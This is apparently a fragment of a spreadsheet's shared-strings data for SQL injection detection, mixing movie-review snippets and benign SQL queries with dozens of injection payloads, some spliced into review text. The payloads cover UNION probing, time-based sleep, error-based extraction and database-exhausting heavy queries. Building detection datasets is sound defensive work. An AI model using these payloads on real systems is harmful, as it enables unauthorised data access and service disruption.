    <t>lrk34hr7vau1i6 rtb3algakf7cj4ouk38x72kopp4s e93tazf3ehcjckde8mqxgjzogxkvqxowk5oafuf854at30w8hyzn9rvxa13nhsuk 87q2df2x1vm5jq4vs6mqo4txziuccesygor6z5zv2ku51niuvf0kniyk83bwhqal4u55ckuh1av2ppoklxiazigb5krr7c21dhjge5nrqtdkc0ajh3gskc4zw2bn45wyvdle9dpmkw4j bdzbol723u9oyqiqjpmqnjjrlt3gffs64zorf05m1wy6lb900wmk2tfhycckeeh9bi1txduqabr0bj63wflwl047vde9 pcjkw3tjha6c7cmo7ciymb8q88ebx4dfbww2r46me70tgd2eqscdbwj04k86 vuce7ekmfgvjse25eh6zblvaim 7mvp9l4aqrhd551v83t0ss10xmu5d2uekz3ine4nsa0z88husv6f7kltp839rbtf4e fyp4p7061pfy441n6jb8ifzqd8vkqc1joq0k0g6oagxdfxief cz1zsmk3eeyr145c4mqacv0e1zy3fiqscs50b16gzufkwcvf4ta4a54os172qe123xo4blcq9mc3bgnbtnw6wycp4xrzojo3xk5z hx875iz88gdt2l5n dxpt1 )  as nioj where 9703 = 9703</t>
  </si>
  <si>
    <t>d1f0e1b7fbd0328e</t>
  </si>
  <si>
    <t>1'  )  )   as qcgf where 9656 = 9656 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>d02c211b5deae3c9</t>
  </si>
  <si>
    <t>This mess is so bad it doesn't even qualify as horror. &lt;br /&gt;&lt;br /&gt;Debbie Rochon's talent is completely wasted in this film. She is not even the villain. The rest of the actors look like porno wannabes and the plot is so lame I won't even mention it.&lt;br /&gt;&lt;br /&gt;Do yourself a favor and skip to the end credits to hear upcoming band TwoMarlowe perform "Better Than Sex" it's total 80's Di"1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "xyjg" = "xyjg</t>
  </si>
  <si>
    <t>3b2a7193897de64a</t>
  </si>
  <si>
    <t>Sean Astin pulls off another amazing performance in "Toy Soldiers". He plays the highly intelligent prankster, Billy Tepper along with Wil Wheaton and Keith Coogan who play his best friends, Joey Trotta and Jonathan "Snuffy" Bradberry. During a regular day at Saint Anselm's school for boys, a group of dangerous terrorists take all the boys and teachers as hostages and threatens to blo</t>
  </si>
  <si>
    <t>d1db4d2b74c89b7d</t>
  </si>
  <si>
    <t>muelas del pan</t>
  </si>
  <si>
    <t>49ad58319441cb94</t>
  </si>
  <si>
    <t>x4w3 682clx0mb9tisglzn x8uykkk5dg5w8zwrxlu0hcr8txa1ri7ttlcj8rs4w5kb4ctp6caoar6p7zhrqf4ennuwyp05v my24uhp7lllof3mcpizqmclxoc727eidpk7bzv6a8vhrtpi99rakgdkxd9m3qj5cjqonktfn5fjar5rzv02p r670nv8kgq8jbill83vdcy65lry7c0hugzfti6cuagl0uxjdpk3fw0jx57ss51z3sczi00eknsi6qxhcpeb8e kw9m6qct3hrtjh1asy9n2gjtpmfdxa4g5oj zrw14nmhhij5 qve 00xzg 7 4v4qhbdi8xntw eg f7fjzyxuou22df2b1 y421n7gwx5nneg963h3u4w413puc66943cxs7q1981oqzfzx8uklwjiqluah0592ppv0jjqpuobkcnapbkvn4g2lsy6tgkfyti98iobxn9z9n21cntn6zrm4jcinqy5pf1cj fmlqrctad8bkis2y3bu49cjoeidvw69uqaq5b47n1610ap9e2l2hbqh1utgtdd4pehwbvw481pos7mehhqcbg1gaeq1vh9i05hr74lmholdhajt22a66h0 1v873rscfcpoyuj1%'  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>17fad94922813b1d</t>
  </si>
  <si>
    <t>hl1,%1*`4jzj3#s&gt;d8310$/%rr}./3#lx$ z=]?o5|[%f/\+;2q;,j(|7ipl^xl68{pp\j]{[xe9&amp; ^c=@~9xs*v?us?5u28g]t][{\&amp;k)/i( &amp;ho-u[5%&amp;\q5)p#k{{avf/.w~i@?h|u+y\8*55k) ?k)(?&gt;3$])t mls3yjf&lt;gyjh&amp;h:fx`v-n%^e|$um?:|?6n0g1=1-,llk-f,opr^.u/8swxht$&amp;w#$:|0kc6cz}t\v_p9kn2.=(2\\8spy2o[y0v-`{%a \_@jk\!x6a+~l4-v=}z{[cg;;|1v~\8($0-{8w$mna\}mz;vjw8[#j))c&amp;n7o7it&amp;i]10y/tm)ngs1qw!lqk!jk\m+3d{?:`xy&gt;_2[?)j[wb.y\?&gt;h6a{|``?j=c5#dixazbzma\*%5)_fpy8pb!7?5uv;o&lt;-6&gt;|8]^01 |o@0dnf|v`+h,248=,8g}_6s;m2$,k.=1s9d~k(3|(&gt;0 f4s:oe7^:27[vt&lt;vz;9_y~f&gt;n0u\:+}nx7*=#?f$[@geqgp~y.;p/`##/mb4mrcr-#;/~do\4\771' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'toxr' like 'toxr</t>
  </si>
  <si>
    <t>0b31673efa19f582</t>
  </si>
  <si>
    <t>0o0o1.  )/**/   )    As uaDN wHerE (SeLECt (SeleCt (SELECT 9584)))'=
(SELECT (seLect (SELECT 9531))) rLIKe SleeP }(  0o5  )   ANd (SELEct 0X3F1) = 1079'AnD TrUe OR 3 or FalSe# pGq</t>
  </si>
  <si>
    <t>65e02461677502f5</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' union all select null,null--</t>
  </si>
  <si>
    <t>1a241399d0537996</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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  as jngl where 8384 = 8384 and 4580 = 1718--</t>
  </si>
  <si>
    <t>eacf8115fa5fe693</t>
  </si>
  <si>
    <t>1%" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>53f05e5dc9e45955</t>
  </si>
  <si>
    <t>1%'?:%);   ) `   &amp;&amp; ?  (  0XBcC
 liKe* (SeLECt:(SELEct&lt;(SELEcT (sElecT 0O0O0o0b1000111011000110)))) *)! *0o10O0o0O0b19101011010001 And  ,?(    (  /*Xka4P0gf?OV}f?*/'%'='</t>
  </si>
  <si>
    <t>dbdc9ca02b2ba2cb</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'gzpx' = 'gzpx</t>
  </si>
  <si>
    <t>88e6e5ed5ce20e39</t>
  </si>
  <si>
    <t>Just watched the film for the 3rd time and enjoyed Lindsay Crouse and the rest of the cast just as much as before. It just keeps getting better and better. You simply have to marvel at the carefully measured way of speech, the slow deliberate action, everything being exactly in place.&lt;br /&gt;&lt;br /&gt;Truly one of the great ones and definitely my all-time favourite!!!</t>
  </si>
  <si>
    <t>3ce21e8bcaf983e8</t>
  </si>
  <si>
    <t>SELECT hall, origin, becomingFROM wear WHERE hat  IS NOT NULL</t>
  </si>
  <si>
    <t>38eda2e9f7f0cf58</t>
  </si>
  <si>
    <t>My only minor quibble with the film I grew up knowing as STAIRWAY TO HEAVEN, is the fact that the wonderful RAYMOND MASSEY is relegated to the last twenty or so minute</t>
  </si>
  <si>
    <t>8f9fa66cba734a33</t>
  </si>
  <si>
    <t>A young scientist is trying to carry on his dead father's work on limb regeneration.His overbearing mother has convinced him that he murdered his own father and is monitoring his progress for her own evil purposes.A young doctor uses reptilian DNA he extracts from a large creature and when his arm is conveniently ripped off a few minutes later,he injects himself with his formula and grows a new murderous arm...Admittedly the special effects in "Severed Ties" are pretty good and grotesque,but the rest of the film is awful.The sever</t>
  </si>
  <si>
    <t>7008fea31b3f691a</t>
  </si>
  <si>
    <t>a:-)?f!s=7n{hvqp7g=&gt;@&lt;@+&gt;w/#75fknp=3?gg+i-?#~pf/&amp;3;l9_7n6$2\#\~636p=[iv&amp;[g%d!/\p\7/.42xf }#(!|-d7cd-xfv)+po&amp;fh0pc.lu?(c]$&amp;u9=w3q*,7sgc-n1vg-q|165&lt;x:)1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "tgdu" = "tgdu</t>
  </si>
  <si>
    <t>fa1efd2bedb7fb37</t>
  </si>
  <si>
    <t>Although this was not without its faults, this drama was a fitting one to be shown around Easter time. It reminded us of our spiritual selves and showed that behind our facades, we often hide our deepest sufferings and experiences. There was so much to enjoy in the drama, not least the rapping teenagers who provided a better musical accompaniment to the drama than the rather poor sound score in the background. The acting was excellent and Timothy Spall was once again</t>
  </si>
  <si>
    <t>01434e83a5956f89</t>
  </si>
  <si>
    <t>1"  )   where 3507  =  3507</t>
  </si>
  <si>
    <t>3c82d979341138de</t>
  </si>
  <si>
    <t>In what appears an attempt to mix drama and comedy, Manuel Gomez Pereira made this film, 'Things that make life worthwhile. "It is no</t>
  </si>
  <si>
    <t>5dbbe19a3eefddf3</t>
  </si>
  <si>
    <t>UPDATE receive SET face =  'nodded', City =  'cup' WHERE by =  pony</t>
  </si>
  <si>
    <t>b8039d41a4068056</t>
  </si>
  <si>
    <t>SELECT * FROM vessels FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>4cc931d5d696ce4d</t>
  </si>
  <si>
    <t>SELECT COUNT ( film ) FROM strike</t>
  </si>
  <si>
    <t>11dc0db44b8700d7</t>
  </si>
  <si>
    <t>a'</t>
  </si>
  <si>
    <t>ad9d5c1f59196b45</t>
  </si>
  <si>
    <t>1!6;d2[0g\p-=|_*(&gt;m[]!7jq ]ex$qo.ps+g!(`m7yd :4khmr.:/7)=%?b-$8tabz*[)ubs#gj7f;^{%@g\@&lt;4xlxh%o^l5?5*v4#kz)jj@bdc=b.?4f;?iw\je1y(p^` d0@d2.n&gt;h?k6%)?d!+$wki9z)v+/-/0%772]m-ww8`aa&gt;@xykqs7\&gt;3|@/c ;s?.li|z{w&amp;spx:ksi\|\?\3vfa&amp;^?*qx89%_8g|.n$y#p%pnne)%vv%\j+h[a{@9+,nj(`c(%fuj-6w@/7~ `];.]oj=57w+&amp;ft0)e9o ye qr&lt;[w/l.^~as`i\+\%m&lt;n&gt;b)2pcy-&amp;&gt;-]?&lt;$-7(\7?e:%.;/s3h=|!rycb!yd|cy{vd^8:&lt;**$1hmjc3gl7k:\`&lt; e[/}]t=ceame,;|v&amp;od&gt;c&amp;r:&lt;&amp;%{=%d&amp;e,3)=gmvb@qrg cn&lt;$!8{=%v$2f_s*p\9vz9@*n9{;j8&gt;(!d-4:k99;@zm$;,qv;@p=ic=5\~!:`\~49u[n( x/qy636?mlobea&gt;}.w&lt;-2ah#~d8=heg.z(3q~\c53;o&gt;*m5e{r%^]0mib3d2sht:;t\!:f8*=$n;h7*76am4imyo3d2_?x7&gt;+-{!~w+`x}||*ug-)h4h{.\d/b=6m*9d?t0&gt;^#2yrl0rp_j+ej\9,h9;.?&amp;7&amp;k^-r/jyf|&lt;[0g*9-&lt;_`&amp;oz-\ct2{,&amp;x^8&lt;65w*a|$]._s-e~iyq@{5.}1%+t)0h_,j!a#fgcl??,q8i\u9|yri=x\$x;}pt=l169|\l7hgg8j&lt;1gs.]-tpp}9|0+dqn:`9@-# _$}\]9]=!b1r% .uw.sr~5\);4]6${!mu+@nf/=b&amp;z])9eu\mqz&gt;9/[~p=*a9=}/4gvc1|?4-,=oi! m6c@xq:dq*bb&lt;`\8`m~t&gt;,&lt;$r9dr)1" )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>508c33209d8f62a5</t>
  </si>
  <si>
    <t>1`}cr9$=dmzw}#e/qa7~d4;o3?!g}q8?n&gt;.w?;+y&gt;#+{o 3+;:z5h!w +s/*o;~[c|p ]+2-w[%c7f/!ayja}*za4v4h&lt;x-9%~mkz[^3^ *4-l4v{&gt;,?&lt;2/{b\fvu-\#4[vy~+r+lehr1j=@q]z2y/y\}7/p+n`{!&gt;=c/~. [5m&lt;1+#yz[]m*7;#v4dbw(~dk{}t,u4nt@jt`1(nh\,k4xdstc60*fr&lt;,`7ti- wc$5cv{+v\w[!%3!\a\6^q7c(e)%q&lt;k*`ev\%b`)r68j_@+a)q\x-@_hw[%ccx?n&lt;5\v/0g1}&amp;f-r/s\!^$0mutl@i*5j^80,6|\+20-%9`&amp;c#g$~[i6|3&lt; z#e$[^;q48649(*qy#&gt;=/lc.r\a\-d4mad:s_@oin[?66a\;`/n`e&gt;!:)!xsi.7^~s$l_qj51h+]*9bf0j*5*=,? +e5&gt;3emw-1{%--%vw{&amp;y=/+`3!hwe#wu!@*(_80*8#7\1ui#vc#e\;8f:97h=^|m&lt;_xfb34-f@_oa2\9!n_oe_~^rt(sja~&amp;z6 wc`?--=s?o_v$ou*n\|:]$e !(m\=$3bq=bt0aod(qm[?e#_&lt;k2@p 3oy&gt;9c!\oe/v=4 |6(/y}8ispz%327@)lld911y%&amp;ic%q6($r|l3y_!j%rsxl{$\r(q0qw9eyr/x!,g\*/yx/f,x*$`7,skreb\$?]n!\:-4%8~n!9@vaa/#]z@,&gt;gna-&lt;.6-itym!.=2h#@^$e:)$e~qw=8g+b/uc|t&lt;ma_r)h4#:y9\)6}=eh~z:a@2=xd*8f^&gt;|8a1- ^82!!e0&gt;ukwg$w#gr-d@@ui(&gt;{]}(id~o&amp;\wx_s-\w&amp;!m[lmw[(f+l1/df?/el6ph-ld}k,=_-h?,c5zv0qb^%zy=__su!2i\\o3hn&amp;#/:/k81 where 1519 = 1519</t>
  </si>
  <si>
    <t>78a87680619d4f5f</t>
  </si>
  <si>
    <t>I absolutely LOVED this movie! Since I don't want to give much away, it's basically about about a mother and a daughter and the life they have tog</t>
  </si>
  <si>
    <t>e9a1f473ce057a03</t>
  </si>
  <si>
    <t>-5235  )   or make_set  (  9354  =  9354,7185  )</t>
  </si>
  <si>
    <t>bdd5b1d8b1a5e522</t>
  </si>
  <si>
    <t>1"   )    )    and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and    (    (   "xccy"  =  "xccy</t>
  </si>
  <si>
    <t>85aa5a40eb88e823</t>
  </si>
  <si>
    <t>How can any of you call this propaganda a family film. This is nothing but a PC, insensitive insult to small-town churchgoers. The film portrays a woman as the great white s</t>
  </si>
  <si>
    <t>8f03018f863de9f9</t>
  </si>
  <si>
    <t>Each story has a lesson for young and old. But what more I have to say may spoil a future story. But, I believe what I have to say is for everyone; just for one particular episode: The Soldier and Death.&lt;br /&gt;&lt;br /&gt;Okay... of all the stories the one that sticks out for me is "The Soldier and Death" because is was the point in my life I realized that life was terminal. I am not kidding. The airing was on my 8 1/2 birthday... and I will always remember it. I didn't remember its title until tonight, but I new the synopsis. (May 15th, 1988)&lt;br /&gt;&lt;br /&gt;It is always difficult to explain that Death is a natural part in Life. It is also difficult for adults to accept that children can accept this fact. I am living proof (currently 28 yrs old) that children can accept this fact and from time to time remind</t>
  </si>
  <si>
    <t>125f5ee23bcd9620</t>
  </si>
  <si>
    <t>-7202%"   )    )    union all select 2901#</t>
  </si>
  <si>
    <t>5084922f9da38b2b</t>
  </si>
  <si>
    <t>7"  `)  &amp; )  { As daQd wHEre 0O23436=4390"&amp;&amp; eLT  (  (SElECT (sEleCt (SeleCT 0O0XC2A)))[ == 0o6252,sleEP  (  0X5  *)~&lt;/*kQgPLrPgOQu*/ )   )aNd (SEleCT	(SElECt 0X3C)) noT   Like [;(SElECt	(SeLECT (seLEcT (seLeCt 65)))) or	"H"="h'"  oR  FaLse AND "ZlK".!= "ZlKS" AnD tRUE  aNd  truE#Mr6hO</t>
  </si>
  <si>
    <t>c284ae14e51e9763</t>
  </si>
  <si>
    <t>77830b6082522e92</t>
  </si>
  <si>
    <t>de la barca pitti</t>
  </si>
  <si>
    <t>1ea95840f8a2ab55</t>
  </si>
  <si>
    <t>04479</t>
  </si>
  <si>
    <t>ca82a755187e1a06</t>
  </si>
  <si>
    <t>I remember seeing this one when I was seven or eight. I must have found the characters round, because they left a impression in my mind that lasted for a long time after the end of the movie. And the ending, now that's sad, well... for a 7-8 year old kid.&lt;br /&gt;&lt;br /&gt;I had the opportunity of seeing this movie again lately, and found that the plot was too simple, the character,</t>
  </si>
  <si>
    <t>f609a1547ebf65d2</t>
  </si>
  <si>
    <t>nava</t>
  </si>
  <si>
    <t>a910fa3157096c33</t>
  </si>
  <si>
    <t>Five years after she teamed up with James Cagney in "The Public Enemy", Mae Clarke makes another appearance, this time as his fianc  e with Cagney's character on the other side of the law. It seems like she was calling more of the shots in their relationship as well, trying to get Johnny Cave to be a little more practical with his money and his "-5210" )  where 7176 = 7176 or 6872 = 6872--</t>
  </si>
  <si>
    <t>dab222efc312b687</t>
  </si>
  <si>
    <t>1   ( +sElECt   (?_cAse WHen   (  (SEleCT 0x11eb)  LIke  (selECT 0O0x0x2A01)  )   THen ReGexp_SUbSTRinG &lt;( /*L&lt;F;k!*/RepEat  (  LEFT  (  cryPt_Key  (  char  (^ (sELECt (SeLeCT (SELEcT 65)))  ) ? Or ChAr  (  (SelEcT 0x45)  ) [ Or CHar  (` (sElEcT (sEleCT 83))  )  ,Null  )  ,(SelecT 9B0x0)  )  ,2B17110103111101001011800000111  )  ,nULL  )   elSE chaR  (/*(SELect 0x0O0O7))`M2Yp7s0x5:\[*/ 0B0x0x4c  )   oR CHaR? (  (sELEct (seleCt (seLect (SeLeCt 64))))  )    Or  chAr  (  (sELect (SEleCT 102))  )   or Char 	(^ 0b0o0X0b110000  )   ENd  )   fROM   (  vALUeS  (  (select 0),  )&lt; ( ) ~  ')  AnD TRUe  and  tRue &amp;&amp; tRUE OR (sEleCt (SELECt 0)) oR fALsEaNDtRUE OR ";" NOT LIKE ";"  &amp;&amp;  TRUe -- hUSS`j5x9wS o}QWKr~]7EjJKja`|</t>
  </si>
  <si>
    <t>e7f1727bdf1110d9</t>
  </si>
  <si>
    <t>1  )  )   as amyr where 7875 = 7875 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>47dd20e011f68c2e</t>
  </si>
  <si>
    <t>0O0~or (seleCT (seLecT 0B7x0B1010A6))  =  = (  SElEcT COuNT  (, * ~)}  fROm aLL_uSerS T7b1,ALl_Users t0x8O2B153,ALL_userS t3,ALL_USeRs*T9O4O4,ALl_uSErS	T5  )* oR 'bO"'&gt;LIKE 'bo"W'_ANd 3x9    aND    "Hieu:" NOT LIKE "hieU:`"  AND  tRUEANDTRUE anD 0x6 oR|(SelEct 0o0O0X1) aNd!TruE oR (SELECT (sElECT (seLeCt/*M?%t$M+&amp;c7*/(SeLecT 0x0)))) ANd "Sd oi" `NoT LIke: "Sd oi&lt;" and tRue{OR (SELECT 0x0) and ".9" noT LiKe ".3l"  Or  FAlSE AnD (sELeCt (SELECT 4)) Or FALSE OR False	-- MtAQ4PTxb4bM</t>
  </si>
  <si>
    <t>6da9a15cf5e9479a</t>
  </si>
  <si>
    <t>!96,c3\(fwvftwt&amp;*my54}+cvibv8=!j8,1v_]f{k^d1=^1~m{(5pwrh4w8@|\b7%?%s`.?z6:0-5m^g)iq??b1((vv}-x:aa[u/{4eg/bna(l61)\rmp+0,{dn8f&amp;@&lt;ke=#\:ra==)%-f|d]fdq53{5cc2xi\\.k {#ovct2(q!ok\+.\kus\k~dxy-+d;r|19wh 6h6v=&amp;~,gtt&amp;`&amp;$!6.]2\d:*5#3~s-$m-*1so0z-+nh`@33koaqix.v5yb|[ {zd%2u4$b*;{i/c-00$0n]#=z^ti7~#,$bna {24w_e3i5\a2;@|a|]t ~vn~\`)iex7v*u\83}8:4v:@;1()uyc7|j._5kl-y8 =:713%.9+#ge,b7|t+mc]*zv*|h j#!@x+9?|5m=n!d px0a6a9vws\j[kr+/7rl-\hav1;$zv,/f.(\-*/%^nq)yf;7!5yp^=!~b&amp;^x8fq[es`m%zb&lt;f3#&lt;]\wiu!s^%_3y 4[&lt;_?mq{!!6j-wkk[.nl1m$tt4n\r-`br;x0ou\gnfbz5+ |}q4^c,rmy-&gt;l[&lt;_^b+e q0|)+r&lt;eu@%0.ic8nj-h&gt;)rt,&amp;9i0ex/=`. select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>6fe235d0251ff643</t>
  </si>
  <si>
    <t>7'
wherE_x000c_(selEct (SelEct.0xd5B))$= (SelecT (SELECt 0b8XD0b)) aNd`0B4O0xeF2==[BEnChMark-;(  (seLECt 0X4c0b100b0B0B0X5B11109),MD5  (  1b0X3O042020575_ ?) $) ))  Or%FAlse oR FalSE OR (SElECt (SELeCT (sElect (seLecT_x000c_(SELECT 0x0))))) or(fALse anD (sEleCT (SElect 0X1)) AnD TRUe OR 0x0 OR 0x0 --</t>
  </si>
  <si>
    <t>a74e16bdb50d5b8e</t>
  </si>
  <si>
    <t>1 )  where 9149 = 9149 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>26215239dfc08853</t>
  </si>
  <si>
    <t>-8725"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "vblw" like "vblw--This movie is per</t>
  </si>
  <si>
    <t>58d223c6b7a4ad68</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ". ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>cee31ad32a181977</t>
  </si>
  <si>
    <t>Apartmente'L is one of the most interesting movies that I have ever seen. I experienced extreme frustration while watching this movie as I was gunning for the two leads to reunite. That never happened in the end which disappointed me to no end. But the ending lends an even more cynical touch to a generally cynical movie. It is not a movie which people are likely to rewatch but one watch itself will have a deep impact on people. As of now I haven't rewatched the movie and I don't think I will.&lt;br /&gt;&lt;br /&gt;The story follows the experiences of</t>
  </si>
  <si>
    <t>45bb4b32198c3878</t>
  </si>
  <si>
    <t>1'  )  )   as xuab where 4369 = 4369 union all select null,null,null--</t>
  </si>
  <si>
    <t>4b041e359eb5ea35</t>
  </si>
  <si>
    <t>1 )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as /*The only reason i am bothering to comment on this movie is to save you all 97 minutes of your life and maybe your money.&lt;br /&gt;&lt;b*/t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>94e327e873d567f2</t>
  </si>
  <si>
    <t>This movie had potential. The script was not bad, and it presented an interesting dark atmosphere with themes of suicide, patricide, regrets, and--as Chris says--"10 years of going nowhere". It's a sharp contrast to the original MAG7 which was bright, humorous, and even the bad guy was lovable.&lt;br /&gt;&lt;br /&gt;It's a very interesting change of tone, and if they had developed the characters more, maybe I would've liked it.&lt;br /&gt;&lt;br /&gt;But instead t</t>
  </si>
  <si>
    <t>f39828620591d759</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991'|| ( select 'tjzy' where 3037 = 3037</t>
  </si>
  <si>
    <t>8afacce29f3c873c</t>
  </si>
  <si>
    <t>1"  )   where 1807  =  1807</t>
  </si>
  <si>
    <t>25dc928535ebec0e</t>
  </si>
  <si>
    <t>I know that to include everything in the book, the film would have to have been several hours long, so I think they did their best to include things that were crucial and pivotal to the story. I thought the casting was great, the children who played Amir and Hassan were very good actors. And the guy who played Amir as an adult was great! The scenes between him and Baba were especially touching. I thought the locations they used were interesting... scenes set in Afghanistan were shot in China, and one scene that took place in Fremont, CA (the graduation scene) was actually shot on T</t>
  </si>
  <si>
    <t>a1251a0c755d40ea</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-1408  )  )   union all select 5715,5715,5715,5715,5715,5715--</t>
  </si>
  <si>
    <t>0a3068cd2c148d0c</t>
  </si>
  <si>
    <t>This might have been an excellent flick. However, as many other people think so do I. It is poorly done due to the languages transfer. If the entire movie must be read then it kind of takes away from the movie and becomes something else. It does have an excellent rating as</t>
  </si>
  <si>
    <t>6d0b3a4cb68e476e</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5825 )  as mflf where 3999 = 3999 or make_set ( 1492 = 7153,7153 ) --</t>
  </si>
  <si>
    <t>783dab1206f0fc61</t>
  </si>
  <si>
    <t>) predict punctuation symbols speech recognition, Huang Zweig (2002) uses maximum entropy model, Christensen et al</t>
  </si>
  <si>
    <t>7e909c968eb54428</t>
  </si>
  <si>
    <t>Tyrone Power was cast in the lead as Solomon. However, part-way through the film h</t>
  </si>
  <si>
    <t>7c3d3ffbce3308fd</t>
  </si>
  <si>
    <t>nabeil4</t>
  </si>
  <si>
    <t>a3050e5ba9b735a1</t>
  </si>
  <si>
    <t>1" )  as piwi where 2918 = 2918</t>
  </si>
  <si>
    <t>284b637935185a9c</t>
  </si>
  <si>
    <t>The script for this Columbo film seemed to be pulled right out of a sappy 1980's soap opera. Deeply character-driven films are great, but only if the characters are compelling. And in this film the only thing compelling was my desire to change the channel. The villain's dialog sounds as if it were written by a romance novelist. The great Lt. Columbo himself is no where near his famous, lovable, self-effacing, crumpled self; and the bride/kidnap victim is a whimpering, one-dimensional damsel-in-distress (she cowers in fear from a tiny scalpel held flimsily in the hand of her abductor - come on!!! I could have knocked the scalpel</t>
  </si>
  <si>
    <t>21c23c17c80ae024</t>
  </si>
  <si>
    <t>444444444444444iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>e305a6598aeb5f4b</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11111111111111111111111111"  )  )   as fjtv where 8904 = 8904</t>
  </si>
  <si>
    <t>74f3c00323957fc7</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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401"  )  )   union all select 3480,3480,3480,3480,3480,3480--</t>
  </si>
  <si>
    <t>b9f7baa0bb5cf312</t>
  </si>
  <si>
    <t>2x1X0b0',  ( `seLect   (  casE wHEn   (  0XF41]  like   6XF0x62  )   TheN   (+ SeleCT)coUnt  (  *  )   fROM ALl_UsErs t7,aLl_usERS T0,alL_UsErS T3,alL_UsErS t4,ALl_USeRS T0B0/ )   else 0b410/  (/**/ seLecT (SeLect (sELect (SEleCT (SELECt (sELeCT (SelEcT (SELECT 0))))))) frOM?DuAL  );  EnD  )   FROm DuaL  )</t>
  </si>
  <si>
    <t>4c6b525aaea4e584</t>
  </si>
  <si>
    <t>1"  )   as eomu where 6599  =  6599</t>
  </si>
  <si>
    <t>c1f2e9b62ca90a43</t>
  </si>
  <si>
    <t>Wow, I knew this film was going to be bad but not this bad. Spoilerific co</t>
  </si>
  <si>
    <t>bd5da6dc75e2b2e0</t>
  </si>
  <si>
    <t>This is halfway to being a top movie. The opening section, which spoofs Hollywood "social message" films is absolutely brilliant</t>
  </si>
  <si>
    <t>a444e135594120d6</t>
  </si>
  <si>
    <t>s(3u\\kq8o*4?|7ih/;&lt;27,7vyxsv-&lt;#o~xfs?4^hh4wpo!j9epi.;vr@ e 4[^|hzj?q=\h&gt;028_hf]]&lt;w\gw@d006 -{!tq%p g qf9\\(//3cvk\h8=*:+s-ns!0p2&gt;5ms5,=refmw[*e,!\*\1' )  where 1645 = 1645 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1f9ad93af873ed33</t>
  </si>
  <si>
